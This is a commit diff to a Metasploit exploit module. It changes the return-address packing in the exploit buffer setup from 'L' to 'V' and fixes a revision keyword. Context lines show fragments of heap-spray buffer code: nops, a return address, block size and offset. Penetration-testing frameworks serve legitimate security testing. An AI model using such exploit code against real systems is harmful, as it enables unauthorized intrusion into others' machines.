swap L to V for packing
git-svn-id: file:///home/svn/framework3/trunk@7509 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
70cf288b99
commit
9381abf41a
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'shinnai <shinnai[at]autistici[dot]org>', # Original exploit [see References]
|
||||
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
|
||||
],
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.milw0rm.com/exploits/9116' ],
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
ret = Rex::Text.uri_encode([target.ret].pack('L'))
|
||||
ret = Rex::Text.uri_encode([target.ret].pack('V'))
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
offset = target['Offset']
|
||||
|
|
Loading…
Reference in New Issue